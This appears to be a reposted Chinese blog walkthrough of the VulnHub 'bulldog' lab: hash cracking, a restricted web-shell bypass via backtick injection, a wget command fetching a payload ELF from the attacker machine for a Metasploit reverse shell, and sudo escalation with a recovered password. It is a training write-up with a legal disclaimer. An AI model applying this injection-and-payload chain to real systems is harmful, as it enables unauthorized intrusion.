当前位置: 首页 > news >正文

vulnhub渗透日记23:bulldog

news 2025/8/27 4:18:16

声明

文中涉及操作均来自靶机虚拟环境,禁止用于真实环境,任何未经授权的渗透测试都是违法行为!

开搞

首先nmap扫描目标机开放端口和服务

在这里插入图片描述

访问80端口

在这里插入图片描述

扫目录撒

在这里插入图片描述

发现登录口

在这里插入图片描述
在这里插入图片描述
点击web-shell提示登录后才能使用

在这里插入图片描述

/dev/下面查看网页源码发现村咋hash值

在这里插入图片描述

awk提取hash

把那堆复制到1.txt中提取
在这里插入图片描述

在线解密

https://crackstation.net/
在这里插入图片描述

nick/bulldog登录

在这里插入图片描述

进入web-shell

可以执行命令
在这里插入图片描述
但是很多命令不让用
在这里插入图片描述
可以用echo `curl` 的方法绕过限制
在这里插入图片描述

创建反弹shell

python起个服务

在这里插入图片描述

wget下载到目标

echo `wget http://192.168.2.129:5555/5555.elf`

在这里插入图片描述

msf建立监听

在这里插入图片描述

给5555.elf添加执行权限并执行

在这里插入图片描述

拿到shell

在这里插入图片描述

进入shell

在这里插入图片描述

查看家目录有啥

在这里插入图片描述

查看hiddenadmindirectory

查看note
在这里插入图片描述

密码藏在customPermissionApp

SUPERultimatePASSWORDyouCANTget
在这里插入图片描述

结束

因为这个文件是bulldogadmin的文件,我的身份是django,所以需要sudo 去给他加执行权限,sudo chmod 777 customPermissionApp就要用到django的密码
执行后变成了root权限
靶标一般就在root目录下
在这里插入图片描述

http://www.lryc.cn/news/547245.html

相关文章:

  • macOS - 使用 tmux
  • Armbian: 轻量级 ARM 设备专用 Linux 发行版全面解析
  • 微服务通信:用gRPC + Protobuf 构建高效API
  • Spring Boot 整合 JMS-ActiveMQ,并安装 ActiveMQ
  • 容器 /dev/shm 泄漏学习
  • Spring Boot 3.x 基于 Redis 实现邮箱验证码认证
  • 车载测试:智能座舱测试中多屏联动与语音交互的挑战
  • C/C++输入输出(1)
  • 前端面试场景题葵花宝典之四
  • 探索Elasticsearch:索引的CRUD
  • Java数据结构第十六期:走进二叉树的奇妙世界(五)
  • 【开源免费】基于SpringBoot+Vue.JS疫情管理系统(JAVA毕业设计)
  • 有关Java中的集合(1):List<T>和Set<T>
  • 使用 Spring Boot 实现前后端分离的海康威视 SDK 视频监控
  • 在 Apache Tomcat 中,部署和删除项目
  • 宇树科技G1人形机器人:从炫技到实用,AI驱动下的进化跃迁‌
  • 给定计算预算下的最佳LLM模型尺寸与预训练数据量分配
  • H5DS编辑器是如何让企业快速构建动态页面
  • 面试题汇总(一)
  • 论坛系统测试报告
  • 算法比赛中处理输入和输出
  • llama.cpp: GGUF格式及模型量化参数介绍
  • PGlite:浏览器中运行的PostgreSQL
  • 【C++】vector(上):vector的常用接口介绍
  • 【算法】二分查找(上)
  • 【人工智能】GPT-4 vs DeepSeek-R1:谁主导了2025年的AI技术竞争?
  • linux nginx 安装后,发现SSL模块未安装,如何处理?
  • 蓝桥杯 - 每日打卡(类斐波那契循环数)
  • 深入探索C++17文件系统库:std::filesystem全面解析
  • LLM | 论文精读 | GIS Copilot : 面向空间分析的自主GIS代理